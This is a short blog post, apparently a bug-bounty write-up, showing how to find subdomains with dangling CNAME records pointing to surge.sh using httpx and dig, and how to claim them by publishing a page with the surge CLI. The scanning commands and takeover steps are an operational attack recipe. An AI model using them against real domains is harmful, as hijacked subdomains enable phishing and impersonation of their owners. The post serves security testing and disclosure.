Still exists! Subdomain takeover via surge.sh

KreSec
3 min readAug 30, 2023

--

Yes it Still exists, although I just found a reference even though it has been around since 2018. but until now when I tried it it was still vulnerable!

Photo by Azamat E on Unsplash

Before going into further discussion, why does subdomain takeover happen?

In general, when a developer wants to connect his subdomain/rootdomain, he has to play with CNAME. Each service has a different cname,….. Read More

Exploitation

I have prepared a target list to find which subdomain has the cname “na-west1.surge.sh” as for the command, I only use the httpx tool.

root@kresec:~# cat surge |httpx -silent -cname -sc -title -mc 404
https://admin.redacted.org [404] [project not found] [na-west1.surge.sh]
https://admin.redacted.com [404] [project not found] [na-west1.surge.sh]
https://administrator.redacted.com [404] [project not found] [na-west1.surge.sh]
root@kresec:~# dig vuln.redacted.com | grep CNAME
vuln.redacted.com. 0 IN CNAME na-west1.surge.sh.
Image 2. if vuln

Vulnerable identification

With the httpx output above I did some identification to find out which ones are really vulnerable to takeover. after doing various experiments i concluded for the vulnerable :
— Body & Title : project not found
— Status code : 404
— Connected to this cname : na-west1.surge.sh
— And Luck 💀 Because even though the characteristics are exactly the same as above, sometimes there are things that cannot be taken over.

How to Custom domain

Well, besides you can see directly how to custom domain from the official article https://surge.sh/help/adding-a-custom-domain, you can follow my explanation below :

Make sure you have installed surge in your terminal, if not:

npm install --global surge

After success, now create a directory anywhere and also make the contents index.html free, if I like below

root@kresec:~/surge# pwd
/root/surge
root@kresec:~/surge# ls
index.html
root@kresec:~/surge# cat index.html
<title>Subdomain takeover by vulnshot.com</title>
Subdomain takeover by vulnshot.com
root@kresec:~/surge#

Then still in the same directory run the surge command, it will bring up the input email & password (if it’s the first time), you can also just fill in a dummy email.

Image 3. success published

Successful takeover

Finally, the subdomain should look like Image 4 below once it has been successfully taken over.

Image 4. takeover
Yeahh!

Reference

https://exploit.linuxsec.org/surge-sh-custom-domain-subdomain-takeover/
https://surge.sh/help/adding-a-custom-domain

Thanks

Thank you very much for those of you who want to clap, share, discuss this post.
You can also help subscribe to my YouTube channel & my community
https://www.youtube.com/@kresec
https://www.youtube.com/@tegalsec1121
https://tegalsec.org/

--

--